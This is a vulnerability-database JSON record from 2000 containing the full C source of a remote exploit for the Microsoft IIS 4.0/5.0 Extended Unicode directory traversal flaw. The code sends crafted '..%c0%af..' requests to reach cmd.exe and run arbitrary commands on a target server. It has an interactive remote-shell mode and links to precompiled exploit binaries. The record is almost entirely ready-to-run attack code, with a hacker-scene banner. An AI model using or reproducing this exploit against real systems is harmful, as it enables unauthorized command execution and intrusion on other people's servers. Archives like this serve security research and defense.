DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:31", "references": [], "description": "\nMicrosoft IIS 4.05.0 and PWS - Extended Unicode Directory Traversal (9)", "edition": 1, "reporter": "Optyx", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2000-11-18T00:00:00", "title": "Microsoft IIS 4.05.0 and PWS - Extended Unicode Directory Traversal (9)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2000-11-18T00:00:00", "id": "EXPLOITPACK:98BA80090B24C9F785BBCAE2DE02A3B1", "href": "", "viewCount": 6, "sourceData": "/****************************************************************************\\\n** **\n** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit **\n** proof of theory exploit cuz it's wednesday and i'm on the couch **\n** **\n** brought to you by the letter B, the number 7, optyx, and t12 **\n** optyx - <optyx@uberhax0r.net optyx@newhackcity.net> **\n** t12 - <t12@uberhax0r.net> **\n** **\n** greetz go out to aempirei, a gun toatin' gangstah' hustler' player **\n** motherfucker who isn't with us anymore, miah, who's GTA2 game was **\n** was most entertaining tonight, Cathy, who provided the trippy light **\n** to stare at, and to KT, for providing me with hours of decent **\n** conversation. **\n** **\n\\****************************************************************************/\n\n#include <stdio.h>\n#include <netdb.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <signal.h>\n#include <errno.h>\n#include <fcntl.h>\n\nvoid usage(void) \n{\n fprintf(stderr, \"usage: ./iis-zank <-t target> <-c 'command' or -i>\"); \n fprintf(stderr, \" [-p port] [-t timeout]\\n\"); \n exit(-1);\n}\n\nint main(int argc, char **argv) \n{\n int i, j;\n int port=80;\n int timeout=3;\n int interactive=0;\n char temp[1];\n char host[512]=\"\"; \n char cmd[1024]=\"\";\n char request[8192]=\"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+\";\n struct hostent *he;\n struct sockaddr_in s_addr;\n\n printf(\"iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\\n\");\n printf(\"by optyx and t12\\n\");\n\n for(i=0;i<argc;i++) \n\t{ if(argv[i][0] == '-') {\n\t\t for(j=1;j<strlen(argv[i]);j++) \n\t\t \t{\n\t\t\t switch(argv[i][j]) \n\t\t\t \t{\n\t\t\t\t case 't':\n\t\t\t\t \tstrncpy(host, argv[i+1], sizeof(host));\n\t\t\t\t \tbreak;\n\t\t\t\t case 'c':\n\t\t\t\t \tstrncpy(cmd, argv[i+1], sizeof(cmd));\n\t\t\t\t \tbreak;\n\t\t\t\t case 'h':\n\t\t\t\t \tusage();\n\t\t\t \t \tbreak;\n\t\t\t\t case 'o':\n\t\t\t\t\ttimeout=atoi(argv[i+1]); \n\t\t\t\t \tbreak;\n\t\t\t\t case 'p':\n\t\t\t\t \tport=atoi(argv[i+1]);\n\t\t\t\t \tbreak;\n\t\t\t\t case 'i':\n\t\t\t\t \tinteractive=1;\n\t\t\t\t \tbreak;\n\t\t\t\t default:\n\t\t\t\t break;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n if(!strcmp(host, \"\")) \n\t{\n\t fprintf(stderr, \"specify target host\\n\");\n\t usage();\n\t}\n\n if(!strcmp(cmd, \"\") && !interactive) \n\t{\n\t fprintf(stderr, \"specify command to execute\\n\");\n\t usage();\n\t}\n\n printf(\"]- Target - %s:%d\\n\", host, port);\n if(!interactive)\n \t printf(\"]- Command - %s\\n\", cmd);\n printf(\"]- Timeout - %d seconds\\n\", timeout);\n if((he=gethostbyname(host)) == NULL) \n\t{\n \t fprintf(stderr, \"invalid target\\n\");\n\t usage();\n\t}\n\n do\n \t{\n\n\t if(interactive)\n\t \t {\n\t\t cmd[0]=0;\n\t\t printf(\"\\nC> \");\n\t\t if(fgets(cmd, sizeof(cmd), stdin) == NULL)\n\t\t \t fprintf(stderr, \"gets() error\\n\"); \n\t\t cmd[strlen(cmd)-1]='\\0';\n\t\t if(!strcmp(\"exit\", cmd))\n\t\t \t exit(-1);\n\t\t }\n\n \t for(i=0;i<strlen(cmd);i++) \n\t\t {\n\t \t if(cmd[i]==' ')\n\t\t \tcmd[i]='+';\n\t\t }\n\n\t strncpy(request, \n\t\t \"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+\",\n\t\t sizeof(request));\n \t strncat(request, cmd, sizeof(request) - strlen(request));\t\n \t strncat(request, \"\\n\", sizeof(request) - strlen(request));\n\n \t s_addr.sin_family = PF_INET;\n \t s_addr.sin_port = htons(port);\n \t memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, \n \t\tsizeof(s_addr.sin_addr));\t\n\n \t if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) \n\t\t {\n\t \t fprintf(stderr, \"cannot create socket\\n\");\n\t \t exit(-1);\n\t\t }\n\n \t alarm(timeout);\n \t j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));\n \t alarm(0);\n\n \t if(j==-1) \n\t\t {\n\t \t fprintf(stderr, \"cannot connect to %s\\n\", host);\n\t \t exit(-1);\n\t \t close(i);\n\t\t }\n\n\t if(!interactive)\n \t \t printf(\"]- Sending request: %s\\n\", request);\n\n \t send(i, request, strlen(request), 0);\n\n\t if(!interactive)\n \t \t printf(\"]- Getting results\\n\");\n\n \t while(recv(i,temp,1, 0)>0) \n\t\t {\n \t alarm(timeout);\n\t \t printf(\"%c\", temp[0]);\n \t alarm(0);\n\t\t }\t\n\n }\n while(interactive);\n\n close(i);\t\n return 0;\n}\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-1.exe\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-2.obsd\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-3.linux\n\n// milw0rm.com [2000-11-18]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645642179, "score": 1659818015}, "_internal": {"score_hash": "8a94af14bf497b568c2244129f490307"}}

{}